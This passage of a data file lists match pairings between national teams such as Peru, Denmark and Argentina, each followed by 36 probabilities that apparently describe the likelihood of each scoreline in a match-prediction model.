('PER', 'DEN',0.00297127097814823,0.00242863599137762,0.00130648855802663,0.000477174993278406,0.000131681620060176,0.00821864419319424,0.00917394862562723,0.00512014703443062,0.00190509791904692,0.0277524209691576,0.0309782584843693,0.0172895276378032,0.0702850298246697,0.0784546985616122,0.118667975500101,0.100178433760511,0.132461496708498,0.0437869895036525,0.00643306586755978,0.000531634842234638,2.91795060165417e-05,0.111822799857399,0.0739291625913031,0.0624103317378718,0.0162922084119434,0.0275074705594338,0.0232215583500463,0.00179520534004686,0.00454648843093091,0.00767620898901334,0.00648018633921215,0.000124085772786059,0.000423712555885822,0.00109319112439235,0.00191491606210142,0.00217985818346385),
('PER', 'ARG',0.000709107277284275,0.000815294406359792,0.000589064582557324,0.000289184577623122,0.000107300259285024,0.00263358738411851,0.00395449947502238,0.00296896662557231,0.00148603093420352,0.0114736849638398,0.017228469972058,0.0129348234030112,0.037490339444396,0.0562941364867214,0.0816666169055925,0.088948732068652,0.12262763545555,0.0422646186957813,0.00647415418542436,0.000557842563399671,3.19743294268188e-05,0.133562195957711,0.0920666090209341,0.10027607911981,0.0211543404574784,0.0460812957053553,0.0501903100726006,0.00243033888697449,0.00794114795070137,0.0172985013497257,0.0188409881546177,0.000175484901909266,0.000773487144040773,0.0025767950004307,0.00583271029675454,0.00924946631100487),
('PER', 'ICE',0.0106793637769269,0.00715398972362269,0.00344134689634117,0.00112807296232302,0.000279822219536311,0.0196539201660063,0.0197654687747761,0.00993882524674041,0.00333174481923762,0.0496632061084665,0.0499450766717767,0.0251142735157043,0.0941199269715415,0.0946541179534173,0.118915139896269,0.0751212360206404,0.119590059622463,0.0475956704059515,0.00841893771120552,0.000837663652262924,5.57784894221026e-05,0.0755475972399996,0.0601344049755985,0.0379881891664363,0.015955268792474,0.0201585687705995,0.0127345988389324,0.00211668014627729,0.00401145629532297,0.00506824539600774,0.00320171896476882,0.000177772959429493,0.00045530686715499,0.000882427366747046,0.00116541964037795,0.000992069180239954),
('PER', 'CRO',0.00190498098631843,0.00168086582946282,0.000955349970175034,0.000368404301478736,0.0001073100558284,0.00593579145404116,0.00699065808753884,0.00411649405772177,0.00161601603311757,0.0219756227983733,0.0258809741604992,0.0152401783931696,0.0610189897735878,0.0718628505830966,0.112952949339994,0.104544247716518,0.13302614401613,0.0423169025994251,0.00598285149585865,0.00047580072678491,2.50957321566143e-05,0.123123107754667,0.0783333020306292,0.0725018353198792,0.0166123871706479,0.0307513797502228,0.0284621152525646,0.0017615203263077,0.00489115561197625,0.00905407405306993,0.00838004997814331,0.000116972134363217,0.000437732386197385,0.00123733835473681,0.00237301794824041,0.00298482184097712),
('PER', 'NGA',0.00552501204529118,0.0035161087773598,0.00149740067219756,0.000431962344681508,9.40631367483073e-05,0.0138194796243634,0.0121549335454837,0.00534544040408943,0.00156719535634092,0.0421056405516777,0.037034047352506,0.016286661897761,0.0962166276041353,0.08462740611716,0.14657797714221,0.111649638519334,0.128922768427112,0.037217048884651,0.00477498184750851,0.000344606959286863,1.64396080598347e-05,0.0982015223053159,0.0566970582585708,0.043186610861313,0.0109114276429153,0.0166226465368588,0.012661605196491,0.00104995970570112,0.00239928856749733,0.00365511527021213,0.00278413105858154,6.30186294120776e-05,0.000193885299776386,0.000450283997201187,0.000708370207742142,0.000688322575733077),
('PER', 'BRA',0.000168015839917786,0.000245882142110201,0.000217283467701363,0.00013033488722109,5.90651283115163e-05,0.000843350457213655,0.00154571027947765,0.00141650499365153,0.000865399949645489,0.00473294572302653,0.00867464147759217,0.00794953176820329,0.0199212335383605,0.0365120516586355,0.0558997248808686,0.078428357253573,0.102454179788796,0.0334600242940724,0.00485668912057557,0.000396530762088504,2.14925149742578e-05,0.14374512632615,0.0938900770850437,0.131729530402599,0.0204420764268415,0.0573612294667256,0.0804788754633067,0.00222536023834724,0.009366665837602,0.0262832139568438,0.0368758396999719,0.000151884903703971,0.000861841886229045,0.00369468195088267,0.0107512960715031,0.0233207899073991),
('PER', 'SWI',0.00210640278051419,0.00184693830395886,0.00104957214513826,0.000404846255947065,0.000117977092811158,0.00634967831831681,0.00748339371515645,0.00440976524231924,0.00173237172264788,0.0229624948410269,0.0270623771730226,0.0159471403984033,0.0622798679190367,0.0733997454361812,0.112612094195806,0.1018104580412,0.132718634820369,0.0432525213211751,0.00626481764112229,0.000510420332010395,2.76049815952526e-05,0.119988399986328,0.0782075679986704,0.0707059785815567,0.0169917083455945,0.0307237623440249,0.0277767706864174,0.00184584535672208,0.00500638131054566,0.00905234873741541,0.0081840567648307,0.000125704816188176,0.000459619643686929,0.0012696235751469,0.00238050609227497,0.00293183506935146),
('PER', 'CRC',0.00552984962386939,0.00311900382497287,0.00116195986731593,0.000292535518858964,5.55410571787798e-05,0.0145997707347074,0.011179866184472,0.00428052639229355,0.00109261332785127,0.0454630661699316,0.0348136286076973,0.0133293774368904,0.10617754328796,0.0813061209881505,0.165316180780358,0.128696891929797,0.126591904272764,0.0311303365355288,0.00340235151118947,0.000209168880435036,8.4593608902254e-06,0.0985504537213145,0.0484692730976421,0.0377328146120843,0.00794608360795301,0.0123718834844915,0.00963137996689569,0.000651343012483214,0.00152119086391464,0.00236846188066641,0.0018438224332133,3.31098647409629e-05,0.000103959727817576,0.000246161949274885,0.000393902707533054,0.000378398446879539),
('PER', 'SRB',0.00500680044237215,0.00391928374382737,0.00209495728562147,0.000762070190444997,0.00020965832228401,0.0115644607370518,0.0128881926536653,0.00718172311078025,0.00266792757401595,0.0344945387426591,0.0384429737731159,0.0214216842200128,0.0771678786060815,0.0860009393229503,0.11508839187537,0.0858215761772598,0.128262043550198,0.0479225404276365,0.00795790942241233,0.000743328317285406,4.6339126300817e-05,0.0956451868153184,0.0714718120029341,0.053296631036247,0.017802672847672,0.0265509565136654,0.0197990857278136,0.00221720389926749,0.00496011622651472,0.00739753133474787,0.00551634955205764,0.000174238331733367,0.000526330054648784,0.00120245813992669,0.00186953283998616,0.0019028383518906),
('PER', 'GER',0.000442063915193944,0.000614386904953923,0.000538726343135574,0.000322005552483296,0.00014566423309648,0.00165978428455735,0.00304468688628522,0.00279256717929145,0.00170754973983999,0.00753793077800304,0.0138274830067043,0.0126824782511036,0.0256752041256006,0.0470982633292979,0.0583021279363089,0.0661949580862819,0.106948671596528,0.043198223425692,0.00775485818167243,0.000783076805362851,5.29555503085316e-05,0.121427177434236,0.0980926319598261,0.111372224153588,0.0264140879829453,0.0599799530071535,0.0680999238940822,0.0035563529596011,0.0121134155870601,0.0275066130671292,0.0312304055361974,0.000303378235136645,0.00139677466221627,0.00486701510636438,0.0115602686303042,0.0207333596168995),
('PER', 'MEX',0.00271319548494697,0.00229384756529343,0.00127372709510347,0.000480352636891021,0.00013689208272703,0.00760815515476833,0.00877193924106568,0.00505687098144432,0.00194346566707158,0.0260616462253299,0.0300481749596632,0.0173222522207555,0.0669553975462004,0.0771972531039362,0.114677464393701,0.0982065772269826,0.132219142422529,0.0445028788207932,0.00665731884220971,0.000560187141358586,3.13279194673408e-05,0.113228780300071,0.0762220446509515,0.0652744299325768,0.0171034256937589,0.0292937920300295,0.0250863852325138,0.00191891448072221,0.00492991428104962,0.00844368176649184,0.0072309332078901,0.000135162768394533,0.000468293008312528,0.00122606255616348,0.00218011570430745,0.0025391431052052),
('PER', 'SWE',0.0023697055691727,0.00217363394552515,0.00131226889402488,0.000538830610426726,0.000167290876969541,0.00663063310099724,0.00833608690729745,0.00524009878600919,0.00219596521265452,0.0229809462724572,0.0288918361823284,0.0181615279912764,0.05973681738228,0.0751016220742404,0.103520174456893,0.0896969991806458,0.130146421584006,0.0472091909591347,0.00761094118759317,0.000690196417870597,4.17212060287564e-05,0.11276781102263,0.0818105801114887,0.070886313472009,0.0197839287573389,0.0342843131949306,0.0297062869985333,0.00239213459030648,0.00621812981418603,0.0107756306975786,0.00933674757526738,0.000182235260893681,0.000639399908344516,0.00169630249002722,0.00306074414935559,0.0037052547329891),
('PER', 'KOR',0.0094938823978778,0.00586923163299759,0.00254149847670778,0.000747511363112034,0.000166149726464335,0.0193391552092548,0.0173919018355631,0.00782035839169211,0.00234430966598691,0.0513674272088696,0.0461952573365028,0.0207719357999814,0.102329156166907,0.0920256660497338,0.135900080015728,0.0902422752228956,0.122216344276902,0.041379815534118,0.00622680540176874,0.000527065468241014,2.96569442354098e-05,0.0811558092952989,0.054955209763973,0.0364921283628269,0.0124044316992483,0.0164739290699111,0.010939249196596,0.0013999575876625,0.00278885835633649,0.0037037936007258,0.0024594449204652,9.92200704653379e-05,0.000266573884092849,0.000541239588590391,0.000746415847570303,0.000643972225146507),
('PER', 'BEL',0.00153625962914037,0.00182296042509677,0.00144414186821998,0.000782718833112658,0.000321557939341819,0.00412407271252742,0.00688639483205449,0.00574946625442548,0.00320016138264471,0.0146082880828703,0.0243929839678771,0.0203657561885992,0.0388091024796724,0.0648036107464513,0.0687347906765259,0.0608680843858787,0.114773657084017,0.05410467773607,0.0113356098808211,0.00133591090308876,0.000106247305367635,0.101637796171419,0.0958247797860709,0.0848576204985631,0.0301147432908466,0.0533362135199558,0.0472318765126412,0.00473206286254057,0.0125714328421503,0.0222652612325113,0.0197169990078543,0.000475486139907412,0.00171144534280693,0.00466923502600444,0.00871548864398243,0.0120224885565108),
('PER', 'TUN',0.0090522636352932,0.00547017743634785,0.00229725555791322,0.000654703899048271,0.000140952618562006,0.0190521065420375,0.0165864788183141,0.00721997011152978,0.00209519930791763,0.0514943680926139,0.0448302261876429,0.0195142619909486,0.104384911692318,0.0908759418763497,0.141066686094239,0.0953193790318413,0.122810545684763,0.0395576174660953,0.00566294147847876,0.000456012290087763,2.43649107618504e-05,0.0829836248184982,0.0534585115344437,0.0361221509097164,0.0114794232465697,0.015513393357461,0.0104824679905078,0.00123251802464589,0.00249845351884811,0.00337643202020674,0.00228146993751826,8.2916523665413e-05,0.000226558730176537,0.000467641583804493,0.000655048057094461,0.000569347326796133),
('PER', 'PAN',0.0196206832080348,0.00888477366211402,0.00292921644768818,0.000654446512797461,0.000110392271131432,0.033913649355793,0.0231122227783994,0.00787551401729519,0.00178905974359103,0.0779597300835334,0.0531297186726007,0.0181040070508525,0.134408703357204,0.0915998117087588,0.154487447291122,0.0887828346468758,0.105283517583128,0.0312127313764102,0.00411263952311425,0.000304811986789907,1.49465176767416e-05,0.0605056870090532,0.0358754684249149,0.0206173759544764,0.0070905138471501,0.0081497355220923,0.0046835949066476,0.00070069310344826,0.00120804999433558,0.00138851543957667,0.000797969924664901,4.32356176661404e-05,0.000100387619695894,0.000175978844720994,0.000209053944488306,0.000148298692071097),
('PER', 'ENG',0.000433216272354982,0.000483191885506472,0.000328232494923337,0.000150986609162069,5.24209278112907e-05,0.00194153972452612,0.00272216600107762,0.00190832761334089,0.000891866814489562,0.00962176951897577,0.0134903517676691,0.0094571788721679,0.035762253859712,0.0501410248521057,0.0886142476948894,0.109787332271267,0.124242985728749,0.0351505023016988,0.00441986162953022,0.000312613938466473,1.46063268188886e-05,0.153929038629791,0.0870984063191705,0.107909302664114,0.016427769685018,0.0407058922419523,0.0504319726592154,0.00154923395403502,0.00575820256793924,0.0142680825049326,0.0176772331266232,9.10587544551147e-05,0.000455588167630921,0.00172041246438024,0.00439934115026942,0.00764949478379353),
('PER', 'POL',0.00536520534714744,0.00488501512244502,0.00314613708852812,0.00138735241710165,0.000463866447133895,0.0106770416576889,0.0145171786409809,0.0098692354329434,0.00447294479823637,0.0298965419260683,0.0406492223036107,0.0276346220572017,0.062784471190119,0.0853657233312477,0.0879006861366745,0.0615321788719163,0.119515311845951,0.0580343083387633,0.0125245911724211,0.00152042440146523,0.000124759948415526,0.0836630277834613,0.0812502745622783,0.0568767622585428,0.0263023675305817,0.0368243310667715,0.0257777433331532,0.00425730584567763,0.00894058907804339,0.0125171702417676,0.0087622610486691,0.00044150362369227,0.00125680940048634,0.00271269883184304,0.00400895483054852,0.00413696011297485),
('PER', 'SEN',0.00600478318245013,0.00381667609298889,0.00163451110679856,0.000474369668173161,0.000103942080251327,0.0145483505883208,0.0128794241858423,0.0057009750470279,0.00168232761640392,0.0433890337375314,0.0384116238557042,0.0170026008894022,0.0970526643508973,0.085919185474184,0.144725042961878,0.107907073960324,0.128122786655737,0.038031446544615,0.0050173776925839,0.000372334493516699,1.82811947508027e-05,0.095528422260031,0.056712536146061,0.0422848990551174,0.0112228789436907,0.0167355697872356,0.0124780503072649,0.00111045123656918,0.00248385921181657,0.0037039336688554,0.00276165504027242,6.86088788064844e-05,0.000206678236683837,0.000470061443216094,0.000724504314444532,0.000691500073113048),
('PER', 'COL',0.000691984687645611,0.000714263498553374,0.000455688218601409,0.000196947595638426,6.42563795427205e-05,0.00278885884832587,0.00367540473583859,0.0024218866401815,0.00106392543941174,0.0126557070290573,0.016678809534554,0.0109904048367755,0.043073241363975,0.0567657253044935,0.0977321465770079,0.110875942604802,0.128800062645133,0.0374054455539568,0.00482804236221522,0.000350533749757578,1.68263076387881e-05,0.146122119011109,0.0848720544796314,0.0962863230863393,0.016432067643927,0.0372839654663821,0.0422982095443153,0.00159070526046588,0.00541390784929504,0.0122840264332707,0.0139360799642112,9.60715452143082e-05,0.00044025848123377,0.00152301216463241,0.00356921370808437,0.00560452366649769),
('PER', 'JPN',0.0108682428164365,0.00786877148097993,0.0041577856244197,0.00150137933123708,0.000410744749104345,0.0187541932584092,0.0208391717523468,0.0115779728122692,0.00428838074867505,0.0462446879762333,0.0513858944552733,0.0285493346860242,0.0855237200776521,0.0950317332790993,0.105443558543483,0.0650015225496387,0.117166139667512,0.0527983951226049,0.0105744260450575,0.00119128428679578,9.0355620688551e-05,0.0722280011681433,0.0650959834541517,0.040128938124191,0.0195560677914859,0.024110987889437,0.0148634107634275,0.00293750679513546,0.00543254846918807,0.00669787565404122,0.00412895886078518,0.000281356894891621,0.000704468400456017,0.00133634539028103,0.00173240369672087,0.00148912783031504),
('DEN', 'ARG',0.000683611409778811,0.000835920717637714,0.000647415166281184,0.000341273889303863,0.000136063521372196,0.00245058644332672,0.00395813207986773,0.00319654293451693,0.00172099473961155,0.010532996006307,0.0170126581346325,0.01373923129908,0.0339543230063342,0.0548422584755335,0.0729704413399659,0.0784095343081361,0.117860214862585,0.0442899909112625,0.00739709907747458,0.000694927994347014,4.35822492496377e-05,0.126645315433643,0.0951825834705934,0.102277331850081,0.0238453989003733,0.0512455890038854,0.0550653483157716,0.00298690699487891,0.00962863793295564,0.020692680556153,0.0222350778781207,0.000236147778014825,0.00102798641638613,0.00338461550871564,0.00758461808487653,0.0122361621551215),
('DEN', 'ICE',0.0106394309927896,0.00755932636336055,0.00389582228478176,0.00137086287641586,0.000365323884721582,0.0188163398739192,0.0203549268830158,0.0110096610496285,0.00396996878198391,0.046908054282675,0.0507436633025438,0.0274464524774901,0.0877043132988465,0.0948757779932307,0.109320907164028,0.0681326852331854,0.118259931900627,0.0513168218942043,0.00989690409365669,0.00107364695826344,7.82673220886867e-05,0.0737038040106447,0.0639649443823082,0.0398652328691255,0.0185043099866816,0.0230650908501556,0.0143749865925516,0.00267654018454762,0.00500434568204244,0.00623777313960749,0.00388760251723141,0.000246300188119797,0.000623113798448453,0.00119387584855306,0.0015618157620286,0.00134363082794465),
('DEN', 'CRO',0.0018758326310041,0.00176079280140545,0.00107305817194865,0.00044437929494317,0.000139097441502316,0.00564784857067194,0.00715482371017953,0.00453194713732001,0.00191372475292362,0.0206287212100556,0.0261329357148167,0.0165529002530182,0.0565096779911852,0.0715877522009837,0.103200570833602,0.0942348125045287,0.130736842864126,0.0453445006887921,0.00698986417692622,0.000606087568816772,3.49679595024647e-05,0.119378815206356,0.0828102109514401,0.0756159063795468,0.0191478167656694,0.0349686229099117,0.0319306530655756,0.00221372994150834,0.00606422302576383,0.0110747627692857,0.0101126203534135,0.000160903061200658,0.000594626342919054,0.00166095842096946,0.00315274549216858,0.00401108029881018),
('DEN', 'NGA',0.00554114598807681,0.00375202261981618,0.00171378212928615,0.000531004917010723,0.000124268801127845,0.0134066269505818,0.0126840191859523,0.00600017973583671,0.00189225808920347,0.040299050948611,0.0381269604421767,0.0180359720432747,0.0908513479944486,0.0859545242273789,0.136545274030295,0.102610540578593,0.129185579783453,0.0406608179088687,0.0056879486112219,0.000447566677224294,2.33481665803962e-05,0.0970799046007113,0.0611112839404614,0.045923683006351,0.0128230761392278,0.0192724762372177,0.0144828095958138,0.00134534304526014,0.00303298033823927,0.00455842583027699,0.00342554908585386,8.83516726888644e-05,0.000268413204888322,0.000615904833560731,0.000958685410043165,0.000937365543962258),
('DEN', 'BRA',0.000158180131603712,0.000246412880675424,0.000233459503891012,0.000150381582920259,7.32323639548455e-05,0.000767466885525573,0.00151305990367457,0.00149149775403009,0.000980161919949666,0.00424922560560754,0.00837734240625793,0.00825795948549704,0.0176449810941867,0.0347870558303329,0.0488473880045868,0.0676132012308238,0.096302557912138,0.0342913162355665,0.00542685190259298,0.000483096967489652,2.8644618840963e-05,0.133299332741088,0.0949301798854612,0.131399725096279,0.0225350941818287,0.0623849061296166,0.0863514587824377,0.00267475775562955,0.0111069767553245,0.0307479390444918,0.0425604453989046,0.0001998433416607,0.00111987077513931,0.0047442923955389,0.0136650090725298,0.030315368929257),
('DEN', 'SWI',0.00207432599068351,0.00193443090416419,0.00117859502283377,0.000488194740367933,0.000152876080019511,0.00603916609685936,0.00765597156125115,0.00485281408116663,0.00205066980007786,0.0215462168681464,0.0273145697517516,0.0173136129950104,0.0576535883286875,0.0730886062031077,0.102846709084781,0.0917327600605423,0.130380828626461,0.0463279434252914,0.00731627107597087,0.00064991877268773,3.84515500479098e-05,0.116291453322308,0.0826431911365751,0.0737124998031738,0.0195769532673137,0.0349228083770098,0.0311489364122259,0.00231874576695145,0.00620452373169706,0.0110680855388484,0.00987203231002541,0.000172860966402251,0.000624177189078372,0.00170387134069413,0.00316215253581977,0.00393993516162039),
('DEN', 'CRC',0.0055825611979787,0.0033539205632536,0.00134069406503277,0.000362617493596656,7.40001614667891e-05,0.0142915894002477,0.0117719271594031,0.00484824553677322,0.00133116039351104,0.04390560053288,0.0361648741009839,0.0148944337722993,0.101162738315835,0.0833273580249327,0.155392470806304,0.119346413438812,0.127996179866445,0.0343182119771091,0.00408949591580584,0.000274117922629773,1.21175192525419e-05,0.0983051812077214,0.0527149802541745,0.040486799618983,0.00942259302123721,0.014473708752337,0.011116273650752,0.00084212550982448,0.00194033839750501,0.00298048454211772,0.00228910795076397,4.68143613692913e-05,0.000145124796402309,0.000339444670565032,0.000537203106845594,0.000517884530237774),
('DEN', 'SRB',0.0049542253242581,0.0041178251231208,0.00235873349533501,0.000921171636477709,0.000272289307579913,0.0110170981813067,0.0132071867714204,0.00791632150066278,0.0031633355983358,0.0324204382012741,0.0388652960597229,0.0232956635014043,0.0715536520505505,0.0857778002207803,0.105281840835206,0.0774542297423123,0.126210814559937,0.0514147831721993,0.00930886923107842,0.000948043744830922,6.46854785951757e-05,0.0928513535604976,0.0756501291462797,0.055654635561541,0.0205451754171073,0.0302295386218324,0.0222394062532059,0.002789844760896,0.00615733754296876,0.00905971690598687,0.00666509427523201,0.000240140470267985,0.000716489937950005,0.00161801737904142,0.0024911907112789,0.00256531857025427),
('DEN', 'GER',0.000417101022809483,0.000615711961749225,0.000578380746620672,0.000371091951705854,0.000180344081137181,0.00150680910713042,0.00297321072889507,0.00293334503905798,0.00192934258679644,0.0067512693949774,0.013321492751683,0.0131428742323011,0.0226868344974173,0.0447652854055586,0.0508242652259449,0.0569296244491768,0.100285596856901,0.0441650592035933,0.00864443378861129,0.000951736695051856,7.04648925413816e-05,0.112332590374774,0.0989409378791263,0.11082640174073,0.0290485873415162,0.0650762056580576,0.0728936056865884,0.00426426333035457,0.0143295476404972,0.0321018223115857,0.0359581133186723,0.000398599324610722,0.0018128040616326,0.00624478977423814,0.0146931953008991,0.0269926104403646),
('DEN', 'MEX',0.00267675520103486,0.00240594426261767,0.00143219473957357,0.000579978939179343,0.000177604727510567,0.00724404017483478,0.00898407917875005,0.00557104024425783,0.00230307330598411,0.024481049919118,0.0303614675711409,0.0188271891140087,0.0620498151595371,0.0769543568182655,0.104847887762254,0.0885826939205357,0.130032647893518,0.0477195058364547,0.00778317778620975,0.000714069512180018,4.36900405294308e-05,0.109860508340875,0.080633429433219,0.0681246570788563,0.0197272888451971,0.0333339359896044,0.0281627976676979,0.00241317979352564,0.0061164598997881,0.0103352104986366,0.00873189539383959,0.00018609574369583,0.000636760419720265,0.00164758500164869,0.00290010175503551,0.00341654984039021),
('DEN', 'SWE',0.00232317888973117,0.00226420199996803,0.00146501400339253,0.000645859354293474,0.000215449725896422,0.00626486181271572,0.00847218047789545,0.00572860537038072,0.00258232769987031,0.0214215607982624,0.0289690873680129,0.0195879289758297,0.0549353617946843,0.0742909123387822,0.0939207621683555,0.0802862607809234,0.127012162677994,0.0502330327481585,0.00882980207345224,0.000873041855526825,5.77538710901375e-05,0.108573774101572,0.0858813807282786,0.0734139584282408,0.0226439322535218,0.038713413478332,0.0330933772094995,0.00298520857230029,0.00765553521035739,0.0130883583592422,0.0111883179838413,0.000249063032812624,0.000863106935816697,0.00226324596457046,0.00404360267035331,0.00496225958212575),
('DEN', 'KOR',0.00951270948814544,0.00624689609293105,0.00289980526870775,0.000915837872266413,0.000218736785478459,0.0186841843502072,0.0180742459034931,0.00874210933848756,0.0028189087793441,0.0489610996917545,0.0473627822840658,0.0229083206853052,0.0962253384236976,0.0930840970212045,0.126077175731335,0.0825949510845024,0.121961431886686,0.0450227001546152,0.0073868289447646,0.000681721630208812,4.19683080630559e-05,0.0798986687514528,0.0589900225063247,0.0386452027904415,0.0145176501255678,0.0190214381790783,0.0124612147031732,0.00178642214576035,0.00351093167076733,0.00460012255074627,0.00301360571299007,0.000138619681677699,0.000367811024379683,0.000738036855345498,0.00100757311110043,0.00087598244237395),
('DEN', 'BEL',0.00146880159160168,0.00184743049238145,0.00156680725809687,0.000911231580337395,0.000402085589378444,0.00377808598024735,0.00678600084176929,0.0060943302594557,0.00364877264015918,0.013202967460941,0.0237144810288125,0.0212973565272207,0.034604496301707,0.0621547900868609,0.0604647486931703,0.0528253005426334,0.108603625665067,0.0558195949026309,0.012751066728566,0.00163843374244251,0.000142766519847319,0.0948820476355483,0.0975340819445955,0.085211090812903,0.0334200809595899,0.0583952090765537,0.0510172379177902,0.00572570013003251,0.0150068512673795,0.0262216066561595,0.0229086249800092,0.000630957787298012,0.00224384242633477,0.00605425855165679,0.0112019929000742,0.0158038222317817),
('DEN', 'TUN',0.0090844935192027,0.00583391778268069,0.00262685610928732,0.000803953967712289,0.0001859959581584,0.0184534413237832,0.0172808472596433,0.00809138189380007,0.00252574270877761,0.0492063107176251,0.0460795753378483,0.0215757616487582,0.0984068894775291,0.0921537829459523,0.131201543804881,0.0874626013898898,0.122864554038462,0.0431490099744941,0.00673492159756181,0.000591312118993362,3.45607543443009e-05,0.0819049319327661,0.0575286623971441,0.0383502077934221,0.0134690586557975,0.0179576988828882,0.0119711019682017,0.00157674047608588,0.00315329728041066,0.00420415149246317,0.00280260441687224,0.000116111334142446,0.000313309381912256,0.000639071734528728,0.000886022474536386,0.000775414682720341),
('DEN', 'PAN',0.019889426372322,0.00957052460636404,0.0033839285554654,0.000812009889261142,0.000147199100730822,0.0332035145225889,0.0243404000119518,0.00892157172607083,0.00218003653800111,0.0753020087157606,0.055201415880182,0.0202331675286309,0.128082657773415,0.0938931667211885,0.145238863274999,0.0823465400082923,0.106469814422495,0.0344149899377039,0.00494408898412109,0.000399528198585108,2.14248631965651e-05,0.060365529138141,0.0390247524923716,0.0221259879756987,0.00840949754401376,0.00953591911066642,0.00540661037173996,0.000906087091219829,0.00154118123535964,0.00174761684849152,0.000990851880057675,6.11802612875733e-05,0.00014027286252698,0.000242962751422287,0.00028560146224589,0.000203323931866701),
('DEN', 'ENG',0.000419890900443956,0.000498960056203521,0.000363552706257509,0.000179627297072381,6.70249486440435e-05,0.00182303245118039,0.00274940799094569,0.00207326103706534,0.0010422634841073,0.00891312039853023,0.013442330350243,0.0101365311566341,0.0326833383522289,0.0492914054153107,0.0798972419746828,0.0976578525480656,0.120497095593379,0.037169438164979,0.00509580611953721,0.000392972647033801,2.00769037346506e-05,0.147282776014435,0.0908639002272487,0.111062323942879,0.0186857069281435,0.0456788236200502,0.0558329137702837,0.0019213111176784,0.00704521632506357,0.0172226394813553,0.0210511144739094,0.000123553958241108,0.000610397409268201,0.00227734014484713,0.00576164470042626,0.0101617956042708),
('DEN', 'POL',0.00523727296003829,0.00504976780528683,0.00348125662054783,0.00164713687752202,0.000591496500700926,0.00997282122914751,0.0145856498788338,0.0106660481271913,0.00519984064687457,0.0275495658273466,0.0402923417795901,0.0294645806082321,0.0570785257127422,0.0834796265286346,0.078838703979531,0.0544472826475313,0.115304757472802,0.0610461461498873,0.014364375827183,0.00190124372427772,0.000170950443276662,0.0796313283175821,0.0843189095251586,0.0582320011328431,0.0297608100300985,0.0411065924155466,0.0283888768200353,0.00525211852617317,0.0108815937144451,0.0150300088337275,0.0103799669179915,0.000597443256528487,0.00168042315950004,0.00358731480557723,0.00525592724045013,0.00552098660206903),
('DEN', 'SEN',0.00602049151093078,0.00407044484931625,0.00186949006589453,0.000582731900890694,0.000137221481409672,0.0141021549608271,0.0134290298071203,0.00639401715771351,0.00202960581170491,0.0414933412507851,0.0395127778698815,0.0188133754468985,0.0915656528879787,0.0871950340466959,0.134708663061982,0.0990896877355693,0.12827873871488,0.041516516961365,0.00597179131725477,0.00048318212744436,2.59445703179376e-05,0.0943599310797222,0.0610778640075621,0.0449279677675975,0.0131782824518825,0.0193874968894515,0.0142611541758538,0.00142168632780031,0.00313731391309648,0.00461552284627971,0.00339510991482267,9.61200952793678e-05,0.000285925554338565,0.000642538905189865,0.000979964246885709,0.00094141873973187),
('DEN', 'COL',0.000674696632386793,0.000741706155045034,0.000507514036621448,0.0002355928333637,8.26066979503935e-05,0.00263269971484784,0.0037321271334187,0.00264534023030522,0.00125001546194401,0.0117865827565143,0.0167087135185922,0.0118431742776373,0.039576351689293,0.05610361681141,0.0885915590289273,0.0991559857865731,0.125587798478884,0.0397663716457862,0.0055963126390877,0.00044300690621906,2.32543882388633e-05,0.140563978074627,0.0890169182011044,0.0996320684799232,0.018790996656377,0.0420635965276752,0.0470796250246417,0.00198333958575298,0.00665955065913185,0.014907386611996,0.0166850728355663,0.000131068086020758,0.00059309664244321,0.00202718387784402,0.00470065809242111,0.00747788625825818),
('DEN', 'JPN',0.0107667315435576,0.0082576643375383,0.00467216364560711,0.00181055437662966,0.000532057586682737,0.0178027002853226,0.0212786667893171,0.0127166568294159,0.00506652547105125,0.0433087901491948,0.0517648053308489,0.0309359261908463,0.0790182643977905,0.0944465329103457,0.0961142235703118,0.0584544854466721,0.114880467810422,0.056443580776968,0.0123253823798974,0.00151394037913128,0.00012577967977222,0.0698676885093772,0.0686554049655657,0.0417546562966219,0.0224880519715166,0.0273534438059813,0.0166357425933261,0.00368297646578061,0.00671970764229034,0.00817354680693652,0.00497096532777219,0.000386765167053619,0.000956729134443375,0.0017946682762197,0.00230574926569573,0.00200842995584998),
('ARG', 'ICE',0.0387861323396851,0.0190378090452239,0.00758896451466213,0.00206758741684885,0.000426791966482087,0.0451653245415718,0.0378691049356569,0.0158757755333722,0.00443704261850141,0.0837008254209018,0.0701793992014327,0.0294211439821963,0.116336397124057,0.097542866684643,0.107797879951186,0.0499430238912191,0.0903837018586104,0.0408926659079531,0.00822277119373851,0.000930065455244067,7.08400994676955e-05,0.0418749921922908,0.0378913461255706,0.0175551541985498,0.0114288905783734,0.0105900664366369,0.00490640392273071,0.00172360648549623,0.00239565341887556,0.00221982428574963,0.0010284500714458,0.000165790925315626,0.000311998796757108,0.000444852545682354,0.000433505931186442,0.000266817036253726),
('ARG', 'CRO',0.00815698378544904,0.00550465051097019,0.00259581795201224,0.000832502032788164,0.000201871978554277,0.0168498713008438,0.0165446654254258,0.00812249390965886,0.00265845639126899,0.0457507466592378,0.0449220520991516,0.0220541839440278,0.0931667718334265,0.09147921911272,0.126483143375601,0.0858567128781479,0.12419212299863,0.0449111167253655,0.00721823702329929,0.000652575778715704,3.93211180582245e-05,0.0843015690585522,0.0609713002194491,0.0413872969712928,0.0146992101964642,0.0199556373393677,0.0135458795505951,0.00177187282887329,0.00360823994403933,0.00489854398938996,0.00332512992319545,0.000134548557909756,0.000369820786769461,0.000768569692974187,0.00108627999608777,0.00097898512323376),
('ARG', 'NGA',0.0210307956417515,0.0100562818173815,0.00355486736467795,0.0008530633389551,0.000154664668189825,0.034307373164427,0.0251576655430503,0.0092240832975262,0.00225467959349156,0.0766611086299909,0.0562157446980674,0.0206115591623597,0.128476586101752,0.0942121382412393,0.143542868705688,0.0801879773639838,0.105260273489318,0.0345429749548168,0.00503816588970742,0.000413340266886246,2.25161631852081e-05,0.0588020046136483,0.0385937848217429,0.0215598139537095,0.00844347760280992,0.00943363326917537,0.00526995160309753,0.000923624287672717,0.00154790476476921,0.00172942554873153,0.000966116519788377,6.33580240834779e-05,0.000143153608269417,0.000244373963566119,0.000283191019751221,0.00019894256828114),
